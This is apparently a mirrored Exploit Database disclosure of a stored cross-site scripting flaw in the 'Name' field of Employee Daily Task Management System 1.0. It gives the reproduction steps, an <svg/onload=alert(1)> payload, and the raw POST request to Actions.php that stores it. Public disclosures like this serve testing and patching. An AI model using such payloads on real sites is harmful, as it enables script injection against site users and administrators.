Employee Daily Task Management System 1.0 – ‘Name’ Stored Cross-Site Scripting (XSS)

• Exploit Database
• 128 阅读

• 作者： Ragavender A G
  日期： 2021-11-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50506/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37

  # Exploit Title: Employee Daily Task Management System 1.0 - &apos;Name&apos; Stored Cross-Site Scripting (XSS) # Date: 09/11/2021 # Exploit Author: Ragavender A G # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/edtms.zip   # Version: v1.0   # Tested on: Windows 10   *Exploit:*   1. Navigate to the URL, http://localhost/edtms/edtms/admin/?page=maintenance 2. Add New department with the following value:   - Name: *<svg/onload=alert(1)>*   3. Save the Department and refresh the page, which should trigger the payload.   *PoC:*   POST /edtms/edtms/Actions.php?a=save_department HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 49 Origin: http://localhost Connection: close Referer: http://localhost/edtms/edtms/admin/?page=maintenance Cookie: PHPSESSID=bmh8mhmk3r0rksta56msbl7dn3   id=&name=%3Csvg%2Fonload%3Dalert(100)%3E&status=1